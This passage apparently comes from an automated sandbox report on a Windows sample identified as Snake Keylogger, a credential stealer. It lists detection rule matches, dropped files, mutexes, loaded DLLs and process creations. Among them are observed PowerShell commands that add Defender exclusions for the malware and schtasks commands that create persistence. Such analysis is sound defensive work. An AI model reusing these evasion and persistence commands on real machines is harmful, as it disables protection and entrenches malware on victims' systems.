                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_01596FC8
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159CFAA
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_01593E09
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159F631
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159E97A
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_015929EC
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_0159FA88
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Code function: 13_2_01593AA1
                Source: e-dekont_html.exe, 00000000.00000002.1764677520.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1777940710.0000000007740000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1769422089.0000000002D08000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1776779283.0000000005E80000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1769422089.0000000002C41000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1778649683.0000000008C6D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePowerShell.EXEj% vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003EDC000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameRemington.exe4 vs e-dekont_html.exe
                Source: e-dekont_html.exe, 00000008.00000002.4158733211.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameUNKNOWN_FILET vs e-dekont_html.exe
                Source: e-dekont_html.exe; Binary or memory string: OriginalFilenamebbvK.exeP vs e-dekont_html.exe
                Source: e-dekont_html.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook; author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1; date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook; author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1; date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook; author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook; author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook; author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: e-dekont_html.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: fahKSvwo.exe.0.dr; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, COVID19.cs; Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, VIPSeassion.cs; Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, VIPSeassion.cs; Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, COVID19.cs; Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, VIPSeassion.cs; Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, VIPSeassion.cs; Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.cs; Security API names: _0020.SetAccessControl
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.cs; Security API names: _0020.AddAccessRule
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, gAT7eoJMygn6gjWsIx.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.cs; Security API names: _0020.SetAccessControl
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.cs; Security API names: _0020.AddAccessRule
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, gAT7eoJMygn6gjWsIx.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@19/15@4/4
                Source: C:\Users\user\Desktop\e-dekont_html.exe; File created: C:\Users\user\AppData\Roaming\fahKSvwo.exe
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Mutant created: NULL
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Mutant created: \Sessions\1\BaseNamedObjects\LhOILbfZuhSGjtSJxZaY
                Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
                Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
                Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
                Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                Source: C:\Users\user\Desktop\e-dekont_html.exe; File created: C:\Users\user\AppData\Local\Temp\tmp7653.tmp
                Source: e-dekont_html.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: e-dekont_html.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\e-dekont_html.exe; File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: e-dekont_html.exe; ReversingLabs: Detection: 63%
                Source: e-dekont_html.exe; Virustotal: Detection: 67%
                Source: C:\Users\user\Desktop\e-dekont_html.exe; File read: C:\Users\user\Desktop\e-dekont_html.exe
                Source: unknown; Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: unknown; Process created: C:\Users\user\AppData\Roaming\fahKSvwo.exe C:\Users\user\AppData\Roaming\fahKSvwo.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Process created: C:\Users\user\AppData\Roaming\fahKSvwo.exe "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe; Process created: C:\Users\user\AppData\Roaming\fahKSvwo.exe "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: version.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: slc.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe; Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptsp.dllJump to behavior
